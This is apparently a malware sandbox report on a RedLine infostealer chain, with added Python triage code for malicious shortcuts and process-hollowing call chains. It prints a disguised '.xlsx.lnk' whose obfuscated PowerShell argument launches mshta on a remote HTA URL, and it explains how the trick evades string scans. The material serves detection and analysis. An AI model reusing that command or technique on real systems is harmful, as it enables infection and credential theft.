Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49716 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\Public\Libraries\bwsiuvcU.pif Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\bwsiuvcU.pif Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\bwsiuvcU.pif
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\bwsiuvcU.pif
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_41D67A03 GetKeyState,GetKeyState,GetKeyState, 23_2_41D67A03
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_41D67A08 GetKeyState,GetKeyState,GetKeyState, 23_2_41D67A08

System Summary

Source: amsi64_7800.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 23.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 25.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 25.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 23.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 27.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 25.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 27.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 23.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 23.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 27.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 27.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 25.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000019.00000001.1624046151.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000019.00000002.1732584170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000001B.00000002.2524457336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000001B.00000001.1707928386.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7688, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7800, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\Public\Libraries\UcvuiswbO.bat, type: DROPPED Matched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
Source: Initial file Strings: https://www.sessosesso.it/assets/aw/yt.htaAC:
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\uc.exe Jump to dropped file
Source: FT. 40FE CNY .xlsx.lnk LNK file: .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta
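The LNK argument string above never contains the word mshta. gp is the alias for Get-ItemProperty and -pa abbreviates -Path, the wildcard path HKLM:\SOF*\Clas*\Applications\msh*e resolves to HKLM:\SOFTWARE\Classes\Applications\mshta.exe, the registry provider's PSChildName note property holds the leaf key name mshta.exe, and the leading dot is PowerShell's call operator, so the whole expression becomes mshta.exe https://www.sessosesso.it/assets/aw/yt.hta. A plain string scan of the shortcut for mshta therefore misses it. The following added example (not part of the report or of Joe Sandbox) parses a Shell Link, recovers the COMMAND_LINE_ARGUMENTS string, and emulates the wildcard resolution against a constructed registry snapshot; the .lnk bytes are built in the block as a fixture carrying the argument string quoted above, and REGISTRY_KEYS is an assumed set of keys, not data from the sample.

```python
"""Parse a Windows Shell Link (.lnk), recover its command line, and resolve the
registry-wildcard LOLBin launch used by this sample. Added example for this
report, not sandbox code; the .lnk bytes are a constructed fixture and
REGISTRY_KEYS is a constructed snapshot of a few HKLM keys."""
import fnmatch
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                 (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location"))          # MS-SHLLINK StringData order

# The PowerShell argument string the report recovered from the sample's LNK.
SAMPLE_ARGS = (".(gp -pa 'HKLM:\\SOF*\\Clas*\\Applications\\msh*e').('PSChildName')"
               "https://www.sessosesso.it/assets/aw/yt.hta")

def build_lnk(arguments, relative_path=r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"):
    """Constructed fixture: header + RELATIVE_PATH + COMMAND_LINE_ARGUMENTS, no IDList/LinkInfo."""
    flags = HAS_RELPATH | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags,
                         0x20,        # FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0,     # creation / access / write FILETIME
                         0, 0,        # FileSize, IconIndex
                         7,           # ShowCommand = SW_SHOWMINNOACTIVE (console starts minimised)
                         0, 0, 0, 0)  # HotKey, Reserved1..3
    def string_data(text):           # CountCharacters (u16) + UTF-16LE chars, no terminator
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + string_data(relative_path) + string_data(arguments)

def parse_lnk(data):
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_cmd = struct.unpack_from("<I", data, 60)[0]
    off = 0x4C
    if flags & HAS_IDLIST:                       # IDListSize (u16) + item list
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINKINFO:                     # LinkInfoSize (u32) includes itself
        off += struct.unpack_from("<I", data, off)[0]
    info = {"flags": flags, "show_command": show_cmd}
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        if flags & IS_UNICODE:
            info[name] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            info[name] = data[off:off + count].decode("cp1252", "replace")
            off += count
    return info

# Constructed snapshot; on a real host Get-ItemProperty walks the live hive.
REGISTRY_KEYS = [
    r"HKLM:\SOFTWARE\Classes\Applications\mshta.exe",
    r"HKLM:\SOFTWARE\Classes\Applications\msiexec.exe",
    r"HKLM:\SOFTWARE\Classes\Applications\notepad.exe",
    r"HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
]

def resolve_wildcard_path(pattern, keys=REGISTRY_KEYS):
    """Emulate PowerShell's per-segment, case-insensitive wildcard matching and
    return the leaf key names, i.e. what .PSChildName yields for each hit."""
    want = pattern.lower().split("\\")
    hits = []
    for key in keys:
        parts = key.lower().split("\\")
        if len(parts) == len(want) and all(fnmatch.fnmatchcase(p, w) for p, w in zip(parts, want)):
            hits.append(key.rsplit("\\", 1)[1])
    return hits

WILDCARD_LOOKUP = re.compile(
    r"(?:gp|Get-ItemProperty)\s+-pa\w*\s+'([^']*\*[^']*)'\s*\)\s*\.\s*\(\s*'PSChildName'\s*\)", re.I)
URL = re.compile(r"https?://[^\s'\"]+", re.I)
LOLBINS = {"mshta.exe", "rundll32.exe", "regsvr32.exe", "wscript.exe", "cscript.exe", "msiexec.exe"}

def triage(lnk_bytes):
    """Return (parsed fields, list of human-readable findings) for one .lnk."""
    info = parse_lnk(lnk_bytes)
    args = info.get("arguments", "")
    findings = []
    if "powershell" in info.get("relative_path", "").lower():
        findings.append("target is powershell.exe")
    if info["show_command"] == 7:
        findings.append("window starts minimised (SW_SHOWMINNOACTIVE)")
    m = WILDCARD_LOOKUP.search(args)
    if m:
        leaves = resolve_wildcard_path(m.group(1))
        findings.append(f"registry wildcard lookup resolves to {leaves}; LOLBin: {sorted(set(leaves) & LOLBINS)}")
    for url in URL.findall(args):
        findings.append(f"remote payload URL: {url}")
    return info, findings

if __name__ == "__main__":
    parsed, notes = triage(build_lnk(SAMPLE_ARGS))
    print(parsed["arguments"])
    for note in notes:
        print(" -", note)
```

The parser follows the MS-SHLLINK layout (76-byte header, optional IDList and LinkInfo, then the StringData fields in fixed order), so it also handles shortcuts that do carry an IDList or LinkInfo even though the fixture omits them. The wildcard regex only covers the gp/Get-ItemProperty plus PSChildName form seen here; Get-ChildItem or Resolve-Path with the same wildcard path would need a second pattern.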
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_0299C3F8 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 19_2_0299C3F8
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_0299C368 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 19_2_0299C368
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_0299C4DC RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, 19_2_0299C4DC
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02997AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary, 19_2_02997AC0
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02997968 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory, 19_2_02997968
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02997F48 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 19_2_02997F48
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_0299C3F6 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 19_2_0299C3F6
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02997966 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory, 19_2_02997966
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02997F46 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 19_2_02997F46
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Code function: 24_2_028BC4DC RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose, 24_2_028BC4DC
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Code function: 24_2_028B7AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary, 24_2_028B7AC0
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Code function: 24_2_028B7968 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory, 24_2_028B7968
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Code function: 24_2_028B7F48 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 24_2_028B7F48
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Code function: 24_2_028BC3F8 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 24_2_028BC3F8
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Code function: 24_2_028BC3F6 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 24_2_028BC3F6
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Code function: 24_2_028BC368 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 24_2_028BC368
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Code function: 24_2_028B7966 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory, 24_2_028B7966
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Code function: 24_2_028B7F46 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 24_2_028B7F46
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_0299CA6C CreateProcessAsUserW,WaitForSingleObject,CloseHandle,CloseHandle, 19_2_0299CA6C
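The call chain at 19_2_02997F48 (and its copy in Ucvuiswb.PIF at 24_2_028B7F48) is the textbook process hollowing sequence: create a child, read its thread context, NtUnmapViewOfSection the original image, NtWriteVirtualMemory the replacement, SetThreadContext to the new entry point, NtResumeThread. The Wow64 variants appear because the 32-bit dropper must use them for a 32-bit child under WOW64. NtUnmapViewOfSection is the step that separates hollowing from plain remote injection (allocate, write, CreateRemoteThread), and the LoadLibraryW/GetModuleHandleW plus GetProcAddress chains at 19_2_02997AC0 and 19_2_02997968 show the Nt* functions being resolved at runtime rather than through the import table. The following added example (not Joe Sandbox code) labels such call chains by ordered-subsequence matching; REPORT_LINES copies a few "Code function" lines from above and adds one constructed line for the remote-thread variant, which the report does not contain.

```python
"""Label the per-function API chains the sandbox lists by injection technique.
Added example for this report, not Joe Sandbox code; REPORT_LINES copies a few
'Code function' lines from above plus one constructed line marked as such."""
import re

REPORT_LINES = [
    r"Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02997F48 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 19_2_02997F48",
    r"Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02997AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary, 19_2_02997AC0",
    r"Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02997968 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory, 19_2_02997968",
    r"Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_0299CA6C CreateProcessAsUserW,WaitForSingleObject,CloseHandle,CloseHandle, 19_2_0299CA6C",
    # Constructed, not from the report: the classic CreateRemoteThread injection chain.
    r"Source: C:\constructed\example.exe Code function: 99_2_00401000 OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread, 99_2_00401000",
]
LINE_RE = re.compile(r"Code function: (\S+) (.+?),? \1$")

# Collapse Win32 / Nt / Zw / WOW64 spellings of one primitive into a single label so
# the signatures match whichever layer the dropper calls.
PRIMITIVE = {
    "CreateProcessA": "create", "CreateProcessW": "create", "CreateProcessAsUserW": "create",
    "NtCreateUserProcess": "create",
    "GetThreadContext": "get_ctx", "Wow64GetThreadContext": "get_ctx",
    "SetThreadContext": "set_ctx", "Wow64SetThreadContext": "set_ctx",
    "NtUnmapViewOfSection": "unmap", "ZwUnmapViewOfSection": "unmap",
    "NtAllocateVirtualMemory": "alloc", "ZwAllocateVirtualMemory": "alloc", "VirtualAllocEx": "alloc",
    "NtWriteVirtualMemory": "write", "ZwWriteVirtualMemory": "write", "WriteProcessMemory": "write",
    "NtResumeThread": "resume", "ResumeThread": "resume",
    "CreateRemoteThread": "remote_thread", "NtCreateThreadEx": "remote_thread",
    "LoadLibraryA": "load_module", "LoadLibraryW": "load_module",
    "GetModuleHandleA": "load_module", "GetModuleHandleW": "load_module",
    "GetProcAddress": "resolve",
}
# Ordered chains: every step must appear in this order; unrelated calls may sit between.
SIGNATURES = {
    "process hollowing": ["create", "get_ctx", "unmap", "write", "set_ctx", "resume"],
    "remote thread injection": ["alloc", "write", "remote_thread"],
    "runtime API resolution": ["load_module", "resolve"],
}

def is_subsequence(needle, haystack):
    """True when every element of needle occurs in haystack in the same order."""
    it = iter(haystack)
    return all(step in it for step in needle)   # `in` advances the iterator

def classify(calls):
    prims = [PRIMITIVE[c] for c in calls if c in PRIMITIVE]
    return [name for name, sig in SIGNATURES.items() if is_subsequence(sig, prims)]

def parse_line(line):
    m = LINE_RE.search(line)
    if not m:
        return None
    func_id, chain = m.groups()
    return func_id, [c for c in chain.split(",") if c]

def label_report(lines):
    """Return {function id: [technique names]} for every parsable report line."""
    out = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            func_id, calls = parsed
            out[func_id] = classify(calls)
    return out

if __name__ == "__main__":
    for func_id, labels in label_report(REPORT_LINES).items():
        print(func_id, labels or "-")
```

Matching on ordered subsequences rather than on the set of names keeps CreateProcessAsUserW followed by WaitForSingleObject (19_2_0299CA6C, an ordinary child launch) out of the hollowing bucket, and the canonical-label table is where to add further spellings (for example NtMapViewOfSection-based variants) when a new dropper is analysed.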
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FFAAB970E65 15_2_00007FFAAB970E65
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAAB955F80 17_2_00007FFAAB955F80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAAB9834B8 17_2_00007FFAAB9834B8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAAB95BC90 17_2_00007FFAAB95BC90
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAAB95BC35 17_2_00007FFAAB95BC35
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAAB95BB3B 17_2_00007FFAAB95BB3B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAAB95E318 17_2_00007FFAAB95E318
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAAB95BA99 17_2_00007FFAAB95BA99
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAAB95DFE0 17_2_00007FFAAB95DFE0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAAB96CEA0 17_2_00007FFAAB96CEA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAABA2362E 17_2_00007FFAABA2362E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAABA232A0 17_2_00007FFAABA232A0
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_029820C4 19_2_029820C4
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_00408C60 23_2_00408C60
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_0040DC11 23_2_0040DC11
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_00407C3F 23_2_00407C3F
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_00418CCC 23_2_00418CCC
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_00406CA0 23_2_00406CA0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_004028B0 23_2_004028B0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_0041A4BE 23_2_0041A4BE
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_00418244 23_2_00418244
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_00401650 23_2_00401650
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_00402F20 23_2_00402F20
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_004193C4 23_2_004193C4
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_00418788 23_2_00418788
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_00402F89 23_2_00402F89
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_00402B90 23_2_00402B90
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_004073A0 23_2_004073A0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_3D941030 23_2_3D941030
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_3D941020 23_2_3D941020
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_411B99A0 23_2_411B99A0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_411B1220 23_2_411B1220
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_411B1AF0 23_2_411B1AF0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_411BCD30 23_2_411BCD30
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_411B0ED8 23_2_411B0ED8
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_411B3EDF 23_2_411B3EDF
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_411B3EF0 23_2_411B3EF0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_41454570 23_2_41454570
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_41450040 23_2_41450040
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_414560F0 23_2_414560F0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_41453370 23_2_41453370
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_4145F3D1 23_2_4145F3D1
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_41459B90 23_2_41459B90
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_4145ABB0 23_2_4145ABB0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_4145D1A8 23_2_4145D1A8
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_41453AB7 23_2_41453AB7
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_41D65168 23_2_41D65168
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_41D60990 23_2_41D60990
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_1_00408C60 23_1_00408C60
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_1_0040DC11 23_1_0040DC11
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_1_00407C3F 23_1_00407C3F
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_1_00418CCC 23_1_00418CCC
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_1_00406CA0 23_1_00406CA0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_1_004028B0 23_1_004028B0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_1_0041A4BE 23_1_0041A4BE
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_1_00418244 23_1_00418244
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_1_00401650 23_1_00401650
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_1_00402F20 23_1_00402F20
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_1_004193C4 23_1_004193C4
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_1_00418788 23_1_00418788
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_1_00402F89 23_1_00402F89
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_1_00402B90 23_1_00402B90
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_1_004073A0 23_1_004073A0
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Code function: 24_2_028A20C4 24_2_028A20C4
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_00408C60 25_2_00408C60
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_0040DC11 25_2_0040DC11
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_00407C3F 25_2_00407C3F
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_00418CCC 25_2_00418CCC
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_00406CA0 25_2_00406CA0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_004028B0 25_2_004028B0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_0041A4BE 25_2_0041A4BE
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_00418244 25_2_00418244
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_00401650 25_2_00401650
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_00402F20 25_2_00402F20
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_004193C4 25_2_004193C4
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_00418788 25_2_00418788
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_00402F89 25_2_00402F89
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_00402B90 25_2_00402B90
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_004073A0 25_2_004073A0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_25B81030 25_2_25B81030
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_25B81020 25_2_25B81020
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_29439A58 25_2_29439A58
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_29431AF0 25_2_29431AF0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_29430ED8 25_2_29430ED8
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_29433EEC 25_2_29433EEC
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_29433EF0 25_2_29433EF0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_29431220 25_2_29431220
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_296DF3D1 25_2_296DF3D1
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_296DABB0 25_2_296DABB0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_296D9B90 25_2_296D9B90
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_296D4570 25_2_296D4570
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_296D0680 25_2_296D0680
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_296DD1A8 25_2_296DD1A8
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_296D3AB7 25_2_296D3AB7
